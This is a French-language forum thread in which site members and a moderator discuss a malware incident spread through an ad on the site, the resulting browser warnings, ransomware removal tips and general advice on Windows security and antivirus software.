

Ben ouais, mais Bibi lapin n'est pas très malin.  ::|:  Ce n'est qu'après coup que je me suis dit que j'avais sûrement merdé.

----------


## aggelon

Bon, je vois que c'est déjà signalé : Firefox avec la page block bad site list de Google

----------


## Mijka

De même pour moi  :tired: .

----------


## titi3

idem ici



 ::O:

----------


## reveur81

Mais que fait la police ?

----------


## L0ur5

plusin

----------


## aggelon

Bon, puisqu'on est tous là, autant boire un coup  ::lol::

----------


## Jotunn

Et la même chose pour moi.

----------


## Thom'

J'ai le même problème et CPC notifier (l'extension sur chrome) ne fonctionne plus, j'imagine que c'est lié ?

----------


## Doc TB

Le probleme etait du à un code malveillant collé à la pub DLGamer. Tout est nettoyé la et il n'y a plus rien de craignos. Reste que Google met super longtemps à déblacklister et que ca fait chier.

----------


## Jelk

Pour rappel, vous pouvez aller chercher mes posts en page 1 et 2, bien réveillé ce matin j'ai choppé la saloperie qui traine.

Si vous l'avez, vous le saurez: hijack complet du PC, il devient inutilisable avec un avertissement vous demandant de payer une amende pour téléchargement illégal, coût de l'opération 100 €.

Bien entendu, payer a peu de chance de fonctionner, sauf comme allègement de votre portefeuille.

Impossible de passer en mode sans echec avec ce ransomware, il force la fermeture de la session.

Ce que j'ai fais pour m'en débarasser: boot sur une clef USB équipée du live CD kaspersky rescue 10 et utilisation de la ligne de commande : " windowsunlock " une fois dedans, a entrer dans le terminal. Ainsi kaspersky fera son travail et vous rendra l'utilisation de votre PC.

Du moins, ça s'est passé comme ça pour moi après un peu de recherche.

L'adresse pour l'iso: http://rescuedisk.kaspersky-labs.com..._rescue_10.iso

Et le lien pour la transformation en usb: http://rescuedisk.kaspersky-labs.com...rescue2usb.exe

----------


## Testoide

En tout cas si il y a un pro de la sécurité, des virus et tout qui peut nous dire comment être sûr qu'on ne soit pas infecté en regardant dans la base de registre ou autre, ce serait top. Merci  :;):

----------


## Doc TB

A priori si vous avez un AV a jour ou un navigateur pas trop vieux, ça ne risque rien.

----------


## n3os

Et si vous ne surfez pas constamment en administrateur, ce que font beaucoup de gens.

Quand on parle sécurité, on oublie souvent que l'idéal sous Windows est de l'utiliser avec un compte
utilisateur standard...

----------


## Lapioche

hello, 
Sur https://www.virustotal.com/   voila   la ligne  suspecte a cette heure :   Google Safebrowsing	Malware site
Possible que tout soit pas partit

----------


## Dark Fread

Si certains comme moi se sont chopés le ransomware idiot, je l'ai eu avec un truc complètement débile : lancer l'ordi (mode sans échec ou normal, peu importe) et dés l'ouverture de session, lancez vite un truc genre Firefox ou n'importe quelle logiciel. Le ransomware bloquera l'ordi avec son message à la con ensuite. Là, vous faites ctrl+alt+suppr et vous essayez d'éteindre la machine. Windows vous informe qu'un programme bloque l'extinction. Annulez ; vous voilà de retour sur le bureau, libre comme l'air pour une durée limitée. Profitez-en pour lancer un coup de Malwarebytes. Si le ransomware réapparaît, recommencez la procédure (Malwarebytes bloquera l'extinction du pc, vous annulez, etc).

----------


## Doc TB

> hello, 
> Sur https://www.virustotal.com/   voila   la ligne  suspecte a cette heure :   Google Safebrowsing	Malware site
> Possible que tout soit pas partit


C'est surtout que Google est super long à la détente pour ré-analyser le site...

---------- Post added at 22h07 ---------- Previous post was at 22h06 ----------




> Si certains comme moi se sont chopés le ransomware idiot, je l'ai eu avec un truc complètement débile : lancer l'ordi (mode sans échec ou normal, peu importe) et dés l'ouverture de session, lancez vite un truc genre Firefox ou n'importe quelle logiciel. Le ransomware bloquera l'ordi avec son message à la con ensuite. Là, vous faites ctrl+alt+suppr et vous essayez d'éteindre la machine. Windows vous informe qu'un programme bloque l'extinction. Annulez ; vous voilà de retour sur le bureau, libre comme l'air pour une durée limitée. Profitez-en pour lancer un coup de Malwarebytes. Si le ransomware réapparaît, recommencez la procédure (Malwarebytes bloquera l'extinction du pc, vous annulez, etc).


Juste pour info, tu avais quoi comme navigateur/version pour etre infecté ?

----------


## Terrestrial

> En tout cas si il y a un pro de la sécurité, des virus et tout qui peut nous dire comment être sûr qu'on ne soit pas infecté en regardant dans la base de registre ou autre, ce serait top. Merci


Tu peux te relaxer hein, à priori si ton PC n'est pas bloqué avec plein d'images de cul et un message du président Camerounais qui te demande de transférer 100€ sur son compte c'est que tu n'es pas infecté  :;):

----------


## Dark Fread

> Juste pour info, tu avais quoi comme navigateur/version pour etre infecté ?


Opera à jour, MSE en antivirus. (et je me suis désinfecté avec Malwarebytes)

----------


## Yshuya

> Et si vous ne surfez pas constamment en administrateur, ce que font beaucoup de gens.
> 
> Quand on parle sécurité, on oublie souvent que l'idéal sous Windows est de l'utiliser avec un compte
> utilisateur standard...


Compte utilisateur standard mais paye ta plaie pour faire quoi que  ce soit sur ton windows. Tu te fais bloqué toutes les 10 secondes.

----------


## Tomaka17

> Opera à jour, MSE en antivirus. (et je me suis désinfecté avec Malwarebytes)


Tu te l'es pas pris hier ton machin t'as dit ?

----------


## Doc TB

> Opera à jour, MSE en antivirus. (et je me suis désinfecté avec Malwarebytes)


MSE, c'est une putain de passoire pour les malware :X

----------


## Pimûsu

Ben ne rien faire de son PC, c'est une bonne solution pour ne pas l'infecter.

 :B):

----------


## M0zArT

> Opera à jour, MSE en antivirus. (et je me suis désinfecté avec Malwarebytes)


C'est pas Opera qu'il faut à jour, c'est Flash/Java et consorts  :;):

----------


## Dark Fread

> Tu te l'es pas pris hier ton machin t'as dit ?


Si si. Pas sûr que ça vienne de CPC du coup, mais ça fait quand même une belle coïncidence (d'autant plus qu'un autre canard se l'est mangé aussi). 
Je réclame 6 mois d'abonnement pour ce préjudice  ::ninja:: 

@M0zArT : ouais, j'avais loupé une màj de Flash par contre, j'étais à l'avant-dernière (faut dire qu'il est con aussi, il m'informe d'une update deux jours avant au démarrage, elle foire, il ne me la repropose plus  :tired: )
_Edit_ : ah et mon Java n'était pas à jour non plus malgré les updates automatiques activées. Bonjour le cumul.

----------


## Doc TB

> Si si. Pas sûr que ça vienne de CPC du coup, mais ça fait quand même une belle coïncidence (d'autant plus qu'un autre canard se l'est mangé aussi). 
> Je réclame 6 mois d'abonnement pour ce préjudice 
> 
> @M0zArT : ouais, j'avais loupé une màj de Flash par contre, j'étais à l'avant-dernière (faut dire qu'il est con aussi, il m'informe d'une update deux jours avant au démarrage, elle foire, il ne me la repropose plus )
> _Edit_ : ah et mon Java n'était pas à jour non plus malgré les updates automatiques activées. Bonjour le cumul.


La faille était bien dans Java jusqu'à SE 7 U9...

----------


## Dark Fread

Okay. Bon ben au moins tout s'explique, c'est déjà ça. J'aime comprendre quand ça déconne  ::ninja::  Du coup la faute était limite plus de mon côté que de celui de CPC/DLGamer  :Emo:

----------


## Anton

Comme souvent dans les cas d'infection  ::trollface::

----------


## Lapioche

C'est surtout que Google est super long à la détente pour ré-analyser le site...

Cela est fort  possible  mais pu.. , ça fait bizarre pour  mon site favori :tired:

----------


## Anonyme2452

J'ai eu le même message que tout le monde sous firefox à jour. Hier soir,  en venant sur CPC j'ai eu un message "installer java runtime...", j'ai fait install mais ça n'a pas marché, installation impossible.
Et aujourd'hui, l'alerte à la con comme tout le monde.
Mais pas de virus détecté avec Avira et rien avec Malwarebytes non plus. Le PC a pas l'air de déconner.

----------


## Aghora

J'essai de mettre à jour Java à la version 7.11. Firefox est buté : il me dit que c'est toujours la version 6.machin qui est installé. 

 :tired:

----------


## Tylers

Punaise, bien fait de désactiver le plugin JAVA.

----------


## Aghora

En attendant j'ai toujours le message d'avertissement.

C'est normal ?

----------


## Testoide

Bon malwarebyte complet rien, avast rien, scan complet en cours avec kaspersky 2013 en version évaluation.
Si il trouve rien, j'estimerais ne pas être infecté j'imagine que noscript ou adblock a fait son job, mais les chances que je formate ce week end sont assez élevés, dans le doute...  ::ninja:: 

Si seulement j'avais un mac !

----------


## Aerial

> Punaise, bien fait de désactiver le plugin JAVA.


Pas mieux, j'avais vu un article la semaine dernière sur le Nouvel Obs, ou assimilé, qui alertait d'une faille zero-day sur Java et conseillait de le désactiver urgemment...

Pour le reste, Kaspersky a fait son boulot, et AdBlock semble l'avoir fait aussi.

Sinon, merci pour les infos, Doc.

Je vais quand même rester en nav' sécurisée le temps que Google/Mozilla repassent le site en white-list...

----------


## Nazedaq

> *En attendant j'ai toujours* le message d'avertissement.
> 
> C'est normal ?


Après toutes ces explications, c'est la question la plus sensée du topic.

Répondez, maintenant !

----------


## Nacodaco

Encore !?!  ::ninja::  (faut toujours ajouter des ninjas)

----------


## Algent

> La faille était bien dans Java jusqu'à SE 7 U9...


Ha elle y est plus ? Je suis en U11 et firefox met encore une alerte rouge dessus (et le désactive en cas d'update de FF).

D'un autre côté Firefox marche toujours uplay comme dangereux alors que la faille est fix depuis un moment, ils doivent pas non plus être super réactif quand ça justifie pas d'augmenter de 1 leur version  ::rolleyes:: .

Bon de toute façon le plugin java sert pas tant que ça  ::|: . Ceci dit j'aurai aimé voir comment nod32 aurait réagit à ce malware.

----------


## ack

> Après toutes ces explications, c'est la question la plus sensée du topic.
> 
> Répondez, maintenant !


Comme dit plus haut, ca prend un peu de temps avant qu'un domaine soit retiré de la liste des diffuseurs de malware.

----------


## Nazedaq

Ok, c'est le message d'alerte qui tarde à disparaître, merci !

----------


## Montigny

Pareil que tout le monde , c'est pas seulement chrome qui pète un boulard alors  :^_^: 

J'ai le même screen que RUPPY et quand je regarde dans les options avancées j'ai ce screen :



En fait il ne détecte absolument rien , mais colle quand même un avertissement , histoire d'emmerder le peuple quoi  :<_<:

----------


## Lt Anderson

Toujours en cours...



Ils sont vraiment longs.

Demain peut-être?

----------


## Doc TB

Je viens de recevoir un mail de Google :

"État du dernier examen relatif à un programme malveillant pour ce site : L'examen de ce site est terminé. Aucun problème n'a été détecté sur ce site. Les avertissements signalant un programme malveillant lors des recherches Web ont été supprimés. Veuillez noter que la propagation de ce changement peut demander un certain temps."

Yapuka...

----------


## vectra

Thx AdBlock: so far so good, alors que j'ai hélas un vieux java.
Ca n'aurait pas été ma première infection par ce vecteur, mais probablement la plus grave...

----------


## Doc TB

On ne dit pas qu'il n'y a pas eu un probleme, on dit qu'il est résolu mais qu'il y a un gros lag entre le moment ou Google vire un domaine de sa blacklist et le moment ou ca se voit en vrai.

Malheureusement. Parceque la encore ca va, mais avec le validateur CPUZ, on est en train de bloquer 90% des forums hardware de la planète pour ceux qui utilisent Chrome...

----------


## gros_bidule

Comptez-vous faire quelque chose pour que ça ne se reproduise plus ? (la pub est tellement importante, financièrement parlant ?)

En tous cas pour ma part, point d'infection car :
- liste de sites à la noix (pubs & co) bloqués au niveau du fichier hosts, au moins c'est radical et sans douleur (ex: http://someonewhocares.org/hosts/)
- plugins activés à la demande (merci Opera pour ça)
- frames désactivées
J'encourage les coincoins à faire de même. C'est efficace, ça ne demande pas l'installation de ouatemille plugins (et donc de ressources & sources de bugs), et le coup du fichier hosts affecte/protège tout le système.
En plus ça élimine 100% des pubs CPC  ::ninja::

----------


## Doc TB

Ben disons que c'est toujours le meme probleme. Si tout le monde fait comme toi, tu n'aura bientot plus que du publi redac bien orienté (mais sans pub !) a te mettre sous la dent. Ce sera toi le produit et la, pas moyen de te mettre toi-meme dans le fichier hosts.

Pour en revenir au probleme, cette trojanitude n'a clairement aucune excuse. On a (j'ai) trop tarder a reagir. Ainsi j'institue une regle : au cas fort improbable ou ca devrait se reproduire, on offre 6 mois d'abo gratos aux 3 premiers qui m'envoyent un PM pour le signaler (avec quelques details techniques inside) et qui mettent en copie doctb at vous savez quoi .com.

----------


## Sk-flown

> La faille était bien dans Java jusqu'à SE 7 U9...


J'ai java 7 U5 et Firefox 13(juillet 2012) et hier j'ai vu le bout de code comme là:



 mais aucune demande spéciale et pas non plus de demande de rançon ou quoi que ce soit, après en soirée Firefox bloqué le site et j'ai pas insisté.

----------


## TarteAuxFleurs

Voilà, c'est parti !
Merci doc pour cette rapide intervention !

----------


## titi3

Le Site est revenu....Gloire au Site....Le Site l'a choisi  ::P:  Nous Remercions le Doc pour Son Intervention....AAAAAAAAAAmmmmmmmmmeeeeeeeeen  ::):

----------


## Doc TB

Oui, c'est réglé là. Cool ! Ceci dit, l'idée que Google puisse a sa guise (pour une bonne raison ou pas) bloquer une partie du web est tout de même flippante. C'est clair que Google a droit de vie et de mort sur les sites webs. Un peu bizarre pour une boite qui hurle sur tous les toits qu'elle veut la neutralité du net. Pareil pour Free avec le blocage de la pub d'ailleurs...

----------


## gros_bidule

Vous vous vantez de ne pas être dépendant de la publicité (dernier CPC Hardware  :;): ), mais en fait... si quand même ? C'est pas joli tout ça.
La publicité est une nuisance, en plus d'être un élément dangereux que vous ne maîtrisez pas (on vient d'en voir les conséquences). Je sais qu'aujourd'hui c'est devenu la norme, mais ça n'en reste pas moins décevant.

----------


## abelthorne

> Oui, c'est réglé là. Cool !


Cool. Et maintenant, vous voulez pas aller jeter un coup d'œil au problème avec le thread de Mark of the Ninja, pour lequel j'avais ouvert ce sujet il y a trois semaines et dont la première page indique toujours qu'il y a une saloperie qui traîne ?




> Ceci dit, l'idée que Google puisse a sa guise (pour une bonne raison ou pas) bloquer une partie du web est tout de même flippante. C'est clair que Google a droit de vie et de mort sur les sites webs. Un peu bizarre pour une boite qui hurle sur tous les toits qu'elle veut la neutralité du net. Pareil pour Free avec le blocage de la pub d'ailleurs...


Oui, enfin, c'est un peu comme se plaindre qu'en voulant entrer dans un immeuble en feu on soit arrêté par un pompier qui nous en empêche en disant "on ne rentre pas, monsieur, il y a le feu."
Ça n'a pas grand chose à voir avec la neutralité du Net.

----------


## Foudge

> Vous vous vantez de ne pas être dépendant de la publicité (dernier CPC Hardware ), mais en fait... si quand même ? C'est pas joli tout ça.
> La publicité est une nuisance, en plus d'être un élément dangereux que vous ne maîtrisez pas (on vient d'en voir les conséquences). Je sais qu'aujourd'hui c'est devenu la norme, mais ça n'en reste pas moins décevant.


Non, leur travail n'est pas influencé par les éditeurs de jeux ou les fabricants des produits qu'ils testent, ce qui est bien différent, c'est ça la véritable indépendance rédactionnelle.

Une étude qui pourrait t’intéresser : *ANALYSE de la notation de la PRESSE FRANCOPHONE sur les Jeux vidéo PC*
http://www.gamestatistics.fr/Analyse...rancophone.pdf

----------


## Kass Kroute

Ce n'est peut être qu'une horrible coïncidence mais après le problème de rafraîchissement inopiné des pages, DLGamer voit sa régie pub tipiakée.
Dans l'histoire, c'est leur réputation qui risque de trinquer au final...

----------


## ack

> Pour en revenir au probleme, cette trojanitude n'a clairement aucune excuse. On a (j'ai) trop tarder a reagir. Ainsi j'institue une regle : au cas fort improbable ou ca devrait se reproduire, on offre 6 mois d'abo gratos aux 3 premiers qui m'envoyent un PM pour le signaler (avec quelques details techniques inside) et qui mettent en copie doctb at vous savez quoi .com.



Bonjour,

Selon mon avocat cette règle doit s'appliquer rétro-activement, afin de ne léser personne.

Bien a vous

----------


## Doc TB

> Vous vous vantez de ne pas être dépendant de la publicité (dernier CPC Hardware ), mais en fait... si quand même ? C'est pas joli tout ça.
> La publicité est une nuisance, en plus d'être un élément dangereux que vous ne maîtrisez pas (on vient d'en voir les conséquences). Je sais qu'aujourd'hui c'est devenu la norme, mais ça n'en reste pas moins décevant.


On n'est pas dependant de la pub. Je parlais en general, a defaut d'un autre modele economique. Bloquer la pub, c'est super simple, mais bloquer les mecs qui bloquent la pub, c'est tout aussi simple. Enfin c'est un autre debat. Dans tous les cas, ce trojan n'etait pas lié specialement a la pub DLGamer. Il autait tres bien pu etre ailleurs dans la page puisqu'il decoule d'un trou de balle de sécu sur l'un de nos servs.

---------- Post added at 09h52 ---------- Previous post was at 09h51 ----------




> Bonjour,
> 
> Selon mon avocat cette règle doit s'appliquer rétro-activement, afin de ne léser personne.
> 
> Bien a vous


Je consulte mon avocat et je vous tiens au courant ;-)

----------


## abelthorne

Dites, d'autres canards ont le même problème que moi avec la première page du thread Mark of the Ninja (cf le lien en première page du présent thread) ? DocTB ne voit rien, je n'ai pas de souci avec Firefox mais j'ai le message "logiciel malveillant" avec Chromium...

----------


## deathdigger

> Il autait tres bien pu etre ailleurs dans la page puisqu'il decoule d'un trou de balle de sécu sur l'un de nos servs.


Tu peux nous filer un peu plus d'explications là-dessus ?
C'est une faille niveau Vbulletin, Apache, ... ?
Savoir si je dois m'inquiéter pour mes sites hébergés  ::P:

----------


## Taï Lolo

> Dites, d'autres canards ont le même problème que moi avec la première page du thread Mark of the Ninja (cf le lien en première page du présent thread) ? DocTB ne voit rien, je n'ai pas de souci avec Firefox mais j'ai le message "logiciel malveillant" avec Chromium...





> Le "coupable" est frostphoenyx  avec son image de Darth Vador.


JPKoffe est sur la bonne piste. Signale le post en question pour que l'image soit virée.
Sous Firefox, pas de souci à l'ouverture de la page mais en faisant clic droit / afficher l'image, le message d'avertissement "page malveillante" apparaît.

----------


## abelthorne

Justement, j'ai envoyé un MP à DocTB et il me dit qu'il ne voit aucun souci.

----------


## Fitz

Dites les canards, petite question... ou plutôt demande de confirmation :

Que risque-t-on avec ce genre de malware si :

- Win7 (à jour) en mode administrateur (pas bien, je sais)
- Firefox (à jour) avec droits restreints grâce à un logiciel tiers
- Adblock+ et Noscript
- Java à jour (enfin quand j'y pense) et plugin Java pour Firefox toujours désactivé

A priori, pas grand chose, non ? En prime j'ai un "gardien des programmes" qui m'avertit en principe de tout comportement suspect.

----------


## SlyTheSly

Si le compte administrateur c'est celui qui est planqué et qu'il faut faite une bidouille bien compliquée pour le faire apparaître, ça va je dois être OK de ce côté là  ::P: 
Perso le plugin java était désactivé sur Chrome hier, j'ai aussi désinstallé complètement java au passage vu que j'en ai pas trop l'utilité et que ça se remet en 2 minutes.
Et au pire si Norton Internet Security fait son taf, je devrais être clean.

J'avoue que le message de Google comme quoi il y a zéro problèmes sur le site m'a laissé pensé que c'était un bug du système et pas un vrai malware... du coup je suis passé outre les avertissements du navigateur...

----------


## ack

Ça dépend de plusieurs choses, déjà de ton logiciel tiers qui restreint les droits de firefox (c'est quoi exactement ?), et de ta conf Adblock+/Noscript.
Sur ce malware précis, si tu bloques tout les scripts et autres joyeusetés potentiellement dangereuses (iframe etc.), tu n'aurais pas eu de problème. 

Ensuite de manière plus générale, a moins de tout bloquer en permanence, tu seras forcement exposé a des contenus qui essaient de t'infecter via un exploit-pack ou autre. Dans ce cas ça dépend de la qualité de l'exploit-pack, et du payload qu'il essaiera d’exécuter sur ta machine (détection ou pas par ton AV). Java a jour ne résout rien, les failles dont on entend parler sont la partie hébergée de l'iceberg, et il y a de nombreux 0-day (failles inconnues des éditeurs) qui circulent sur ce soft, comme sur d'autres d'ailleurs. 

Idem pour les AV, qu'il soient gratuits ou payants ils ne fonctionnent quasiment que sur les bases de malwares connus (aussi bien pour les malwares web que les virus, rootkits, RAT etc.), donc ils n’empêchent pas du tout que tu te fasses infecter un jour ou l'autre. Pour ma part je n'en ai même plus sur ma machine tellement le bénéfice est faible. 

Donc il faut garder a l'esprit que quels que soient les logiciels de "sécu" que tu as, et même sur un système complètement a jour (OS et programmes) tu es potentiellement attaquable, tout dépend juste de la qualité de l'attaque. 

Par contre, la base de tout, c'est de ne pas utiliser ta machine en tant qu'administrateur. La c'est comme si tu mettais un panneau "Ne pas entrer" devant chez toi tout en laissant la porte grande ouverte avec un coffre-fort visible depuis l’extérieur.

----------


## Qiou87

> Si le compte administrateur c'est celui qui est planqué et qu'il faut faite une bidouille bien compliquée pour le faire apparaître, ça va je dois être OK de ce côté là


Pas que. Par défaut le compte principal sur un PC a les droits admin. Tu peux vérifier en allant dans Panneau de conf' - Comptes d'utilisateurs. Tu as un lien "Gérer les comptes d'utilisateurs" et tu vois les différents comptes avec le groupe auxquels ils appartiennent.

----------


## Fitz

> Si le compte administrateur c'est celui qui est planqué et qu'il faut faite une bidouille bien compliquée pour le faire apparaître, ça va je dois être OK de ce côté là 
> Perso le plugin java était désactivé sur Chrome hier, j'ai aussi désinstallé complètement java au passage vu que j'en ai pas trop l'utilité et que ça se remet en 2 minutes.
> Et au pire si Norton Internet Security fait son taf, je devrais être clean.
> 
> J'avoue que le message de Google comme quoi il y a zéro problèmes sur le site m'a laissé pensé que c'était un bug du système et pas un vrai malware... du coup je suis passé outre les avertissements du navigateur...


C'est le compte que j'ai créé à l'installation de Seven... et pas celui dont tu parles (d'ailleurs je vais me renseigner là-dessus).

Et même réaction que toi hier, je suis passé outre en pensant à un faux positif. J'avais désactivé Adblock+ pour le site de CPC, mais je me suis aperçu hier qu'il était à nouveau activé - aucun souvenir l'avoir fait, peut-être que j'étais tombé sur un alerte de ce genre il y a peu et avais décidé de le réactiver partout, je ne sais plus.

Edit :



> Pas que. Par défaut le compte principal sur un PC a les droits admin. Tu peux vérifier en allant dans Panneau de conf' - Comptes d'utilisateurs. Tu as un lien "Gérer les comptes d'utilisateurs" et tu vois les différents comptes avec le groupe auxquels ils appartiennent.


Oui, c'est bien le compte par défaut en question, avec les droits administrateur.

Edit2 : 
Je suis peut-être un peu HS là non ? Enfin cette question touche tout le monde sous Windows à priori... Faut-il que je pose mes questions ailleurs ? Dans le sujet sur Windows 7 par ex ?

Je constate que la commande "control userpasswords2" fonctionne toujours.
Voilà le compte "Administrateur", il est désactivé par défaut, sans doute une bonne chose. De mémoire sous XP il était activé et sans mot de passe. Ici il n'y a rien d'autre à faire ?



---------- Post added at 11h46 ---------- Previous post was at 11h33 ----------




> Ça dépend de plusieurs choses, déjà de ton logiciel tiers qui restreint les droits de firefox (c'est quoi exactement ?), et de ta conf Adblock+/Noscript.
> Sur ce malware précis, si tu bloques tout les scripts et autres joyeusetés potentiellement dangereuses (iframe etc.), tu n'aurais pas eu de problème. 
> 
> Ensuite de manière plus générale, a moins de tout bloquer en permanence, tu seras forcement exposé a des contenus qui essaient de t'infecter via un exploit-pack ou autre. Dans ce cas ça dépend de la qualité de l'exploit-pack, et du payload qu'il essaiera d’exécuter sur ta machine (détection ou pas par ton AV). Java a jour ne résout rien, les failles dont on entend parler sont la partie hébergée de l'iceberg, et il y a de nombreux 0-day (failles inconnues des éditeurs) qui circulent sur ce soft, comme sur d'autres d'ailleurs. 
> 
> Idem pour les AV, qu'il soient gratuits ou payants ils ne fonctionnent quasiment que sur les bases de malwares connus (aussi bien pour les malwares web que les virus, rootkits, RAT etc.), donc ils n’empêchent pas du tout que tu te fasses infecter un jour ou l'autre. Pour ma part je n'en ai même plus sur ma machine tellement le bénéfice est faible. 
> 
> Donc il faut garder a l'esprit que quels que soient les logiciels de "sécu" que tu as, et même sur un système complètement a jour (OS et programmes) tu es potentiellement attaquable, tout dépend juste de la qualité de l'attaque. 
> 
> Par contre, la base de tout, c'est de ne pas utiliser ta machine en tant qu'administrateur. La c'est comme si tu mettais un panneau "Ne pas entrer" devant chez toi tout en laissant la porte grande ouverte avec un coffre-fort visible depuis l’extérieur.


Je vois...
Le logiciel tiers en question, c'est Online Armor, plutôt bien noté dans plusieurs comparatifs que j'ai lu - c'est aussi un pare-feu.

Je vais essayer de voir si changer mon utilisateur de groupe est jouable (d'administrateur à simple utilisateur). J'ai peur de bugs en série suite à la manœuvre...

----------


## ack

J'ai regarde un peu Online Armor, ben ... hum. J’espère que tu as la version Free et que tu ne payes pas pour ça. A la limite si tu veux un semblant de sécurité, prends un vrai antivirus connu, type Kaspersky, McAfee .. eux ont la R&D pour assurer derrière et faire ce qu'ils disent, mais le petit éditeur qui te dit qu'il fait tout, de l'antivirus, du firewall, de l'anti-rootkits heuristique, de la surveillance phishing&malware, du monitoring système et j'en passe .. C'est 90% de marketing et 10% de code. 

Apres comme je disais plus haut, même un antivirus connu n'est pas du tout une garantie pour la sécurité de ton PC, au contraire. 

(ah et par contre n'installe pas Armor Online et un antivirus, les deux utilisant des méthodes similaires de protection au niveau du noyau windows ils se marcheraient dessus, au mieux ils fonctionneraient mal, au pire ils ne fonctionneraient pas)

----------


## kenshironeo

Il n'y aucun moyen pour less sites lésés de poursuivre google dans la mesure ou le problème porte atteinte à leur réputation? De demander une indemnisation?

----------


## gripoil

J'ai l'impression que plus ça va plus les plugins java web servent à se faire infecter la gueule et à plus rien d'autre.
Chez environ hmmmm 99.99% des clients chez qui je vais je vois des vielles ou très vielles versions de java installées.
C'est un peu la nouvelle grosse faille de service pour faire passer a peu près ce qu'on veut sur un paquet d'ordis (même à jour). Surtout qu'au final y'a pas besoin d'aller sur superstreaming2000 pour se faire infecter.
En plus l'utilisateur moyen à tendance à se faire des fixations pas possible sur les trucs comme l'UAC, ou n'importe quel popup de mise à jour. Du coup il clique plus sur rien, sauf les fausses barres de notif bien grasses et les popup java.

Enfin bon ça fera un argument de plus pour pas trop accabler l'employé qu'a pourri son ordi entre midi et deux et expliquer au patron qu'on peut choper des merdes sur des sites tout à fait respectables. (Ouais bon CPC c'est pas respectable du tout mais bon  ::ninja:: )

M'enfin c'est quand même un peu la honte quoi  ::sad::

----------


## ducon

> La faille était bien dans Java jusqu'à SE 7 U9...


J’ai une version plus ancienne mais…




> Punaise, bien fait de désactiver le plugin JAVA.


Elle est désactivée.  ::lol:: 
Au fait, comment on pourrait virer cette cochonnerie sous Linusque si on l’a attrapée ?

----------


## Fitz

> J'ai regarde un peu Online Armor, ben ... hum. J’espère que tu as la version Free et que tu ne payes pas pour ça. A la limite si tu veux un semblant de sécurité, prends un vrai antivirus connu, type Kaspersky, McAfee .. eux ont la R&D pour assurer derrière et faire ce qu'ils disent, mais le petit éditeur qui te dit qu'il fait tout, de l'antivirus, du firewall, de l'anti-rootkits heuristique, de la surveillance phishing&malware, du monitoring système et j'en passe .. C'est 90% de marketing et 10% de code. 
> 
> Apres comme je disais plus haut, même un antivirus connu n'est pas du tout une garantie pour la sécurité de ton PC, au contraire. 
> 
> (ah et par contre n'installe pas Armor Online et un antivirus, les deux utilisant des méthodes similaires de protection au niveau du noyau windows ils se marcheraient dessus, au mieux ils fonctionneraient mal, au pire ils ne fonctionneraient pas)


J'ai effectivement la version free (pare-feu et gardien des programmes). La version payante incorporait le moteur de Kaspersky à une époque, mais je ne sais pas si c'est encore le cas. Qu'est-ce qui te fait penser qu'OA ne vaut pas grand chose ? Tout ce que j'en avais lu était plutôt positif et il arrivait généralement en tête de divers comparatifs (je ne retrouve pas les liens, mais Malekal le recommandait : petit tuto http://www.malekal.com/2010/11/12/tu...ne-armor-free/)
Pour l'AV et OA, il suffit généralement de les placer en exclusions mutuelles pour que ça fonctionne correctement - sinon effectivement, on a des problèmes.

Je n'accorde pas une confiance aveugle à OA, d'ailleurs quand il signale un comportement, je vérifie toujours ce que c'est avant d'autoriser ou interdire (provisoirement ou avec une règle). Je fais toujours attention à la source de mes logiciels, et double cette prudence par un scan via virustotal.com avant d'installer quoi que ce soit. Est-ce suffisant pour autant...  :tired: 

Quant à Kaspersky, j'ai eu trop de soucis avec : sans parler des ressources systèmes énormes qu'il demande, j'avais sans arrêt des faux positifs, dont une suppression pure et simple de mes pilotes graphiques (installés depuis le CD pressé du constructeur). Toujours agréable de perdre du temps...
Avast gratuit, c'est ce que j'ai. Tu vas me dire que ça ne sert pas à grand chose, et c'est vrai : j'en attends peu. Il m'a bloqué plusieurs fois l'accès à des pages malveillantes, et c'est toujours ça de gagné. Comme il est très léger, je le garde (pour l'instant), mais je préfère être prudent en amont (mises à jour, etc.).

Je crois que ma seule vraie négligence est d'utiliser un compte admin... il faut que je m'en occupe : par ex. en dupliquant mon compte principal et le passer dans le groupe utilisateurs, pour voir si ça coince quelque part.

----------


## ack

> Qu'est-ce qui te fait penser qu'OA ne vaut pas grand chose ?


Je ne connais pas vraiment ce soft hein, donc je ne peux pas t'en dire grand chose, mais comme je disais un soft qui dit faire autant de choses, ben .. Quand tu vois la complexité que c'est pour faire juste une fonction antivirus, et le nombre d'ingés qu'il faut pour en développer le moteur et surtout le maintenir et l’améliorer, c'est hors de portée des petits/moyens éditeurs. Apres si OA intègre les moteurs AV d'autres éditeurs, pourquoi pas. 

Faut pas oublier que dans le marché de la sécurité, autrement appelé "marché de la peur", ce qu'on vend c'est une _impression_ (souvent fausse) de sécurité, le soft derrière limite on s'en fout de ce qu'il fait. Il n'y a qu'a voir avec quelle facilite on peut bypasser n'importe quel antivirus avec quelques combines qu'un enfant de 8 ans aurait pu inventer. 

Je les ai plus sous la main, mais tu trouveras de nombreuses études faites par des chercheurs en sécurité qui auditent les antivirus .. les résultats sont affligeants, ça fait des années et pourtant rien ne change(ra).

----------


## Fitz

Je suis bien d'accord sur le fait qu'une fausse impression de sécurité est dangereuse. D'ailleurs je multiplie les mesures de précaution ET surtout de prévention, mais toujours en réfléchissant à ces mesures et aux logiciels utilisés (ça me rappelle quelques PC vérolés jusqu'à la moelle avec de faux logiciels de sécurité...).

Entièrement d'accord sur l'aspect marketing de la chose, qui ne m'a pas échappé malgré les bons tests d'OA ces dernières années...

Si tu retrouves des liens, ça m'intéressera ! Tu penses aux tests de sites tels que matousec.com ?

----------


## SlyTheSly

(EDIT : avant toutes choses merci pour vos remarques !)
Et donc si on est infecté, est-ce que ça peut être "dormant" ou on le sait forcément ?
Et si c'est planqué, comment est-ce détectable (hormis par Norton and co) ? Certains processus ? Utiliser un petit programme fait pour l'occasion ?

----------


## ack

En voila un parmi d'autres 

Tu en trouveras plein d'autres sur google, dont certains plus a jour (celui au dessus date de 2010), mais celui-la est en français ce qui est assez rare.




> Il aura fallu moins d’une après-midi aux spécialistes de la sécurité informatique [...] pour contourner les 15
> antivirus les plus vendus dans le monde.


Quand tu sais qu'aujourd'hui les auteurs de malware ne sont plus des hackers passionés dans leur garage, mais bien des hangars remplis de développeurs qualifiés dans les pays de l'Est, imagine le nombre de méthodes de contournement ils peuvent mettre au point ..

----------


## golwin

> (EDIT : avant toutes choses merci pour vos remarques !)
> Et donc si on est infecté, est-ce que ça peut être "dormant" ou on le sait forcément ?
